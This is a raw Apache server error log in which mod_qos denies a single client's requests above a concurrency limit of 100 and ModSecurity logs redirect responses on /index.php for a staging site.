[Tue May 26 19:59:30.141033 2026] [security2:error] [pid 106517:tid 106770] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuSYZZc2DoU1lPnP1PJQAAAPw"]
[Tue May 26 19:59:30.142483 2026] [qos:error] [pid 93576:tid 93738] [client 45.148.10.120:35166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSmDRMqfxdEDkoszwswAAABo
[Tue May 26 19:59:30.145989 2026] [qos:error] [pid 93868:tid 94258] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSkqK9k_ZUB2Vp256ywAAAY8
[Tue May 26 19:59:30.167456 2026] [qos:error] [pid 93576:tid 93726] [client 45.148.10.120:35220] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSmDRMqfxdEDkoszwtQAAAA4
[Tue May 26 19:59:30.169989 2026] [qos:error] [pid 93576:tid 93806] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSmDRMqfxdEDkoszwtgAAAF4
[Tue May 26 19:59:30.212399 2026] [qos:error] [pid 93576:tid 93739] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSmDRMqfxdEDkoszwtwAAABs
[Tue May 26 19:59:30.264889 2026] [qos:error] [pid 93576:tid 93837] [client 45.148.10.120:35272] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSmDRMqfxdEDkoszwuAAAAH0
[Tue May 26 19:59:30.269329 2026] [qos:error] [pid 93868:tid 94263] [client 45.148.10.120:35050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSkqK9k_ZUB2Vp2560QAAAZQ
[Tue May 26 19:59:30.276863 2026] [security2:error] [pid 93576:tid 93721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSGDRMqfxdEDkoszwAwAAAAk"]
[Tue May 26 19:59:30.277918 2026] [security2:error] [pid 93868:tid 94343] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSEqK9k_ZUB2Vp256NgAAAeQ"]
[Tue May 26 19:59:30.296239 2026] [qos:error] [pid 106517:tid 106755] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuSoZZc2DoU1lPnP1PLQAAAO0
[Tue May 26 19:59:30.296847 2026] [qos:error] [pid 93576:tid 93744] [client 45.148.10.120:35166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSmDRMqfxdEDkoszwvQAAACA
[Tue May 26 19:59:30.296989 2026] [qos:error] [pid 106517:tid 106738] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuSoZZc2DoU1lPnP1PLgAAANw
[Tue May 26 19:59:30.298194 2026] [security2:error] [pid 93576:tid 93810] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSGDRMqfxdEDkoszwAAAAAGI"]
[Tue May 26 19:59:30.299526 2026] [security2:error] [pid 93868:tid 94275] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSEqK9k_ZUB2Vp256PwAAAaA"]
[Tue May 26 19:59:30.302190 2026] [security2:error] [pid 93868:tid 94267] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSEqK9k_ZUB2Vp256PAAAAZg"]
[Tue May 26 19:59:30.307551 2026] [security2:error] [pid 93868:tid 94309] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSEqK9k_ZUB2Vp256QQAAAcI"]
[Tue May 26 19:59:30.307923 2026] [security2:error] [pid 93868:tid 94269] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSEqK9k_ZUB2Vp256OQAAAZo"]
[Tue May 26 19:59:30.308811 2026] [security2:error] [pid 93868:tid 94312] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSEqK9k_ZUB2Vp256QgAAAcU"]
[Tue May 26 19:59:30.319542 2026] [security2:error] [pid 93576:tid 93749] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSGDRMqfxdEDkoszwHQAAACU"]
[Tue May 26 19:59:30.321755 2026] [security2:error] [pid 93868:tid 94368] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSEqK9k_ZUB2Vp256VAAAAf0"]
[Tue May 26 19:59:30.321842 2026] [security2:error] [pid 93868:tid 94279] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSEqK9k_ZUB2Vp256VQAAAaQ"]
[Tue May 26 19:59:30.324978 2026] [security2:error] [pid 106517:tid 106735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSIZZc2DoU1lPnP1PDgAAANk"]
[Tue May 26 19:59:30.325173 2026] [security2:error] [pid 93868:tid 94362] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSEqK9k_ZUB2Vp256TwAAAfc"]
[Tue May 26 19:59:30.331186 2026] [security2:error] [pid 93576:tid 93805] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSGDRMqfxdEDkoszwBAAAAF0"]
[Tue May 26 19:59:30.333124 2026] [security2:error] [pid 93576:tid 93778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSGDRMqfxdEDkoszwEAAAAEI"]
[Tue May 26 19:59:30.353824 2026] [security2:error] [pid 93868:tid 94314] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSEqK9k_ZUB2Vp256ZAAAAcc"]
[Tue May 26 19:59:30.356314 2026] [security2:error] [pid 93576:tid 93753] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSGDRMqfxdEDkoszwCQAAACk"]
[Tue May 26 19:59:30.358074 2026] [security2:error] [pid 93868:tid 94266] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSEqK9k_ZUB2Vp256WQAAAZc"]
[Tue May 26 19:59:30.359368 2026] [security2:error] [pid 93868:tid 94334] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSEqK9k_ZUB2Vp256ZQAAAds"]
[Tue May 26 19:59:30.361832 2026] [security2:error] [pid 93576:tid 93809] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSGDRMqfxdEDkoszwDAAAAGE"]
[Tue May 26 19:59:30.372521 2026] [security2:error] [pid 93868:tid 94342] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSEqK9k_ZUB2Vp256bwAAAeM"]
[Tue May 26 19:59:30.373953 2026] [security2:error] [pid 93868:tid 94350] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSEqK9k_ZUB2Vp256bgAAAes"]
[Tue May 26 19:59:30.394854 2026] [security2:error] [pid 93576:tid 93822] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSGDRMqfxdEDkoszwDQAAAG4"]
[Tue May 26 19:59:30.398329 2026] [security2:error] [pid 93576:tid 93795] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSWDRMqfxdEDkoszwWgAAAFM"]
[Tue May 26 19:59:30.404343 2026] [security2:error] [pid 93868:tid 94364] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSEqK9k_ZUB2Vp256cQAAAfk"]
[Tue May 26 19:59:30.413843 2026] [security2:error] [pid 106517:tid 106702] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSIZZc2DoU1lPnP1PFgAAALg"]
[Tue May 26 19:59:30.425691 2026] [security2:error] [pid 93576:tid 93760] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSWDRMqfxdEDkoszwVQAAADA"]
[Tue May 26 19:59:30.435049 2026] [security2:error] [pid 93576:tid 93799] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSWDRMqfxdEDkoszwTgAAAFc"]
[Tue May 26 19:59:30.435592 2026] [security2:error] [pid 93576:tid 93712] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSWDRMqfxdEDkoszwXAAAAAA"]
[Tue May 26 19:59:30.437872 2026] [security2:error] [pid 106517:tid 106734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSIZZc2DoU1lPnP1PEwAAANg"]
[Tue May 26 19:59:30.439170 2026] [security2:error] [pid 93576:tid 93717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSWDRMqfxdEDkoszwXgAAAAU"]
[Tue May 26 19:59:30.448764 2026] [security2:error] [pid 93576:tid 93768] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSWDRMqfxdEDkoszwYgAAADg"]
[Tue May 26 19:59:30.546783 2026] [qos:error] [pid 93868:tid 94269] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSkqK9k_ZUB2Vp2569wAAAZo
[Tue May 26 19:59:30.550156 2026] [qos:error] [pid 93868:tid 94297] [client 45.148.10.120:35250] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSkqK9k_ZUB2Vp256-AAAAbY
[Tue May 26 19:59:30.557647 2026] [qos:error] [pid 93576:tid 93733] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSmDRMqfxdEDkoszw6wAAABU
[Tue May 26 19:59:30.565675 2026] [qos:error] [pid 93868:tid 94309] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSkqK9k_ZUB2Vp256-QAAAcI
[Tue May 26 19:59:30.582400 2026] [qos:error] [pid 93576:tid 93761] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSmDRMqfxdEDkoszw7AAAADE
[Tue May 26 19:59:30.583410 2026] [qos:error] [pid 93868:tid 94354] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSkqK9k_ZUB2Vp256-gAAAe8
[Tue May 26 19:59:30.584215 2026] [qos:error] [pid 93576:tid 93714] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSmDRMqfxdEDkoszw7QAAAAI
[Tue May 26 19:59:30.588288 2026] [qos:error] [pid 93868:tid 94312] [client 45.148.10.120:35230] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSkqK9k_ZUB2Vp256_AAAAcU
[Tue May 26 19:59:30.596153 2026] [qos:error] [pid 93868:tid 94270] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSkqK9k_ZUB2Vp256_gAAAZs
[Tue May 26 19:59:30.606129 2026] [qos:error] [pid 93576:tid 93790] [client 45.148.10.120:35102] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSmDRMqfxdEDkoszw7gAAAE4
[Tue May 26 19:59:30.695376 2026] [qos:error] [pid 93868:tid 94265] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSkqK9k_ZUB2Vp256_wAAAZY
[Tue May 26 19:59:30.701507 2026] [qos:error] [pid 93868:tid 94279] [client 45.148.10.120:35250] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSkqK9k_ZUB2Vp257AAAAAaQ
[Tue May 26 19:59:30.709176 2026] [qos:error] [pid 93576:tid 93820] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSmDRMqfxdEDkoszw8gAAAGw
[Tue May 26 19:59:30.715756 2026] [qos:error] [pid 93868:tid 94362] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSkqK9k_ZUB2Vp257AQAAAfc
[Tue May 26 19:59:30.732937 2026] [qos:error] [pid 93868:tid 94336] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSkqK9k_ZUB2Vp257AwAAAd0
[Tue May 26 19:59:30.734105 2026] [qos:error] [pid 93576:tid 93715] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSmDRMqfxdEDkoszw9AAAAAM
[Tue May 26 19:59:30.734910 2026] [qos:error] [pid 93576:tid 93796] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSmDRMqfxdEDkoszw9QAAAFQ
[Tue May 26 19:59:30.737419 2026] [qos:error] [pid 93868:tid 94383] [client 45.148.10.120:35230] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSkqK9k_ZUB2Vp257BAAAAgw
[Tue May 26 19:59:30.751349 2026] [qos:error] [pid 93868:tid 94341] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSkqK9k_ZUB2Vp257BQAAAeI
[Tue May 26 19:59:30.762897 2026] [qos:error] [pid 93576:tid 93806] [client 45.148.10.120:35102] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSmDRMqfxdEDkoszw9gAAAF4
[Tue May 26 19:59:30.843307 2026] [qos:error] [pid 93868:tid 94355] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSkqK9k_ZUB2Vp257BwAAAfA
[Tue May 26 19:59:30.853119 2026] [qos:error] [pid 93868:tid 94305] [client 45.148.10.120:35250] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSkqK9k_ZUB2Vp257CwAAAb4
[Tue May 26 19:59:30.865303 2026] [qos:error] [pid 93576:tid 93838] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSmDRMqfxdEDkoszw-AAAAH4
[Tue May 26 19:59:30.866333 2026] [qos:error] [pid 93868:tid 94351] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSkqK9k_ZUB2Vp257DAAAAew
[Tue May 26 19:59:30.881476 2026] [qos:error] [pid 93868:tid 94283] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSkqK9k_ZUB2Vp257DQAAAag
[Tue May 26 19:59:30.885132 2026] [qos:error] [pid 93576:tid 93739] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSmDRMqfxdEDkoszw-QAAABs
[Tue May 26 19:59:30.887613 2026] [qos:error] [pid 93868:tid 94282] [client 45.148.10.120:35230] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSkqK9k_ZUB2Vp257DgAAAac
[Tue May 26 19:59:30.887688 2026] [qos:error] [pid 93576:tid 93728] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuSmDRMqfxdEDkoszw-gAAABA
[Tue May 26 19:59:30.906725 2026] [qos:error] [pid 93868:tid 94291] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSkqK9k_ZUB2Vp257DwAAAbA
[Tue May 26 19:59:30.917880 2026] [qos:error] [pid 93576:tid 93807] [client 45.148.10.120:35102] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSmDRMqfxdEDkoszw-wAAAF8
[Tue May 26 19:59:30.990805 2026] [qos:error] [pid 93868:tid 94294] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSkqK9k_ZUB2Vp257EQAAAbM
[Tue May 26 19:59:31.004855 2026] [qos:error] [pid 93868:tid 94329] [client 45.148.10.120:35250] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuS0qK9k_ZUB2Vp257EgAAAdY
[Tue May 26 19:59:31.016896 2026] [qos:error] [pid 93868:tid 94357] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuS0qK9k_ZUB2Vp257EwAAAfI
[Tue May 26 19:59:31.019225 2026] [qos:error] [pid 93576:tid 93799] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuS2DRMqfxdEDkoszw_QAAAFc
[Tue May 26 19:59:31.028952 2026] [qos:error] [pid 93868:tid 94314] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuS0qK9k_ZUB2Vp257FAAAAcc
[Tue May 26 19:59:31.035822 2026] [qos:error] [pid 93576:tid 93712] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuS2DRMqfxdEDkoszw_gAAAAA
[Tue May 26 19:59:31.040312 2026] [qos:error] [pid 93868:tid 94261] [client 45.148.10.120:35230] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuS0qK9k_ZUB2Vp257FQAAAZI
[Tue May 26 19:59:31.042085 2026] [qos:error] [pid 93576:tid 93803] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuS2DRMqfxdEDkoszw_wAAAFs
[Tue May 26 19:59:31.062162 2026] [qos:error] [pid 93868:tid 94266] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuS0qK9k_ZUB2Vp257FgAAAZc
[Tue May 26 19:59:31.074649 2026] [qos:error] [pid 93576:tid 93773] [client 45.148.10.120:35102] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuS2DRMqfxdEDkoszxAAAAAD0
[Tue May 26 19:59:31.137968 2026] [qos:error] [pid 93868:tid 94319] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuS0qK9k_ZUB2Vp257GQAAAcw
[Tue May 26 19:59:31.159526 2026] [qos:error] [pid 93868:tid 94325] [client 45.148.10.120:35250] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuS0qK9k_ZUB2Vp257GgAAAdI
[Tue May 26 19:59:31.167406 2026] [qos:error] [pid 93868:tid 94289] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuS0qK9k_ZUB2Vp257GwAAAa4
[Tue May 26 19:59:31.171247 2026] [qos:error] [pid 93576:tid 93742] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuS2DRMqfxdEDkoszxAwAAAB4
[Tue May 26 19:59:31.176554 2026] [qos:error] [pid 93868:tid 94342] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuS0qK9k_ZUB2Vp257HQAAAeM
[Tue May 26 19:59:31.276615 2026] [security2:error] [pid 93868:tid 94375] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSEqK9k_ZUB2Vp256fAAAAgQ"]
[Tue May 26 19:59:31.280364 2026] [security2:error] [pid 93576:tid 93804] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSWDRMqfxdEDkoszwTAAAAFw"]
[Tue May 26 19:59:31.290256 2026] [security2:error] [pid 93576:tid 93839] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSWDRMqfxdEDkoszwZAAAAH8"]
[Tue May 26 19:59:31.292541 2026] [security2:error] [pid 93576:tid 93720] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSWDRMqfxdEDkoszwZgAAAAg"]
